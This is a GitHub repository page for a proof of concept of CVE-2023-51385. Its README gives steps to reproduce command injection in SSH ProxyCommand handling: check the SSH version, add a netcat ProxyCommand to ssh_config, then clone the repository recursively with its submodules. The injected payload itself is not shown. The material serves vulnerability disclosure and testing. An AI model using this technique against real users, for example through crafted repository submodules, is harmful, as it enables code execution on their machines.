Skip to content

Proof of conept to exploit vulnerable proxycommand configurations on ssh clients

Notifications You must be signed in to change notification settings

Tu0Laj1/CVE-2023-51385_test

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

1.step 1

ssh -V

image

2.step 2

vim /etc/ssh/ssh_config
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

image

3. step 3

git clone https://github.com/Tu0Laj1/CVE-2023-51385_test --recurse-submodules

image

About

Proof of conept to exploit vulnerable proxycommand configurations on ssh clients

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published